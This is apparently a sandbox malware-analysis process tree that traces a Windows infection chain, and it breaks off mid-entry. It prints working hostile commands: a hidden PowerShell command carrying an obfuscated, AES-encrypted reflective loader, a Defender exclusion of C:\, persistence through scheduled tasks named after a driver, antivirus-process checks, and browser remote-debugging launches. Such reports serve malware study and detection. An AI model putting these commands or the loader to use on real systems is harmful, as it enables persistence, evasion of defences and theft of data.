- - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:2552
  - - C:\Users\Admin\AppData\Local\Temp\10362200101\bae6544296.exe
      "C:\Users\Admin\AppData\Local\Temp\10362200101\bae6544296.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1224
  - - C:\Users\Admin\AppData\Local\Temp\10380550101\1ba54af266.exe
      "C:\Users\Admin\AppData\Local\Temp\10380550101\1ba54af266.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:488
  - - C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe
      "C:\Users\Admin\AppData\Local\Temp\10429610101\9sWdA2p.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1676
  - - C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
      "C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4084
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4704
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3692
    - - C:\Drivers\pcidrv.exe
        
        C:\Drivers\pcidrv.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:3392
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10432230101\but2.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4864
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2856
  - - C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe
      "C:\Users\Admin\AppData\Local\Temp\10434400101\larBxd7.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:4560
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5132
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6056
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6064
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5180
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5188
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 689912
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5232
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Exclusion.psd
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5312
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "users" Findarticles
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5304
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5532
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5668
      - C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
        
        Jordan.com b
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SendNotifyMessage
        
        PID:5764
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6036
  - - C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe
      "C:\Users\Admin\AppData\Local\Temp\10443260101\qhjMWht.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5456
  - - C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe
      "C:\Users\Admin\AppData\Local\Temp\10462640101\LJl8AAr.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5144
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5776
  - - C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe
      "C:\Users\Admin\AppData\Local\Temp\10462700101\n0hEgR9.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:6056
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6060
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5964
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5860
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6036
  - - C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe
      "C:\Users\Admin\AppData\Local\Temp\10465960101\amnew.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:4060
    - - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5264
      - C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        6⤵
        
        PID:1260
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:4088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff9c8c8dcf8,0x7ff9c8c8dd04,0x7ff9c8c8dd10
        9⤵
        
        PID:5232
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1924,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1920 /prefetch:2
        9⤵
        
        PID:1408
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2192,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2196 /prefetch:11
        9⤵
        
        PID:2360
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2336,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2348 /prefetch:13
        9⤵
        
        PID:3616
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3064 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3052,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3096 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:3216
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4288 /prefetch:9
        9⤵
        Uses browser remote debugging
        
        PID:5196
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3700,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4684 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5544
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4900,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5180 /prefetch:14
        9⤵
        
        PID:5696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5508,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5520 /prefetch:14
        9⤵
        
        PID:6104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5696,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5616 /prefetch:14
        9⤵
        
        PID:5192
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5724,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5740 /prefetch:14
        9⤵
        
        PID:5788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5884,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5768 /prefetch:14
        9⤵
        
        PID:2344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6028,i,10281718146945273345,1652196487182981121,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6048 /prefetch:14
        9⤵
        
        PID:6292
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        
        PID:6520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f4,0x7ff9ca25f208,0x7ff9ca25f214,0x7ff9ca25f220
        9⤵
        
        PID:6668
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1708,i,10088706880392395121,849753726388212419,262144 --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:11
        9⤵
        
        PID:4904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2604,i,10088706880392395121,849753726388212419,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:2
        9⤵
        
        PID:2944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
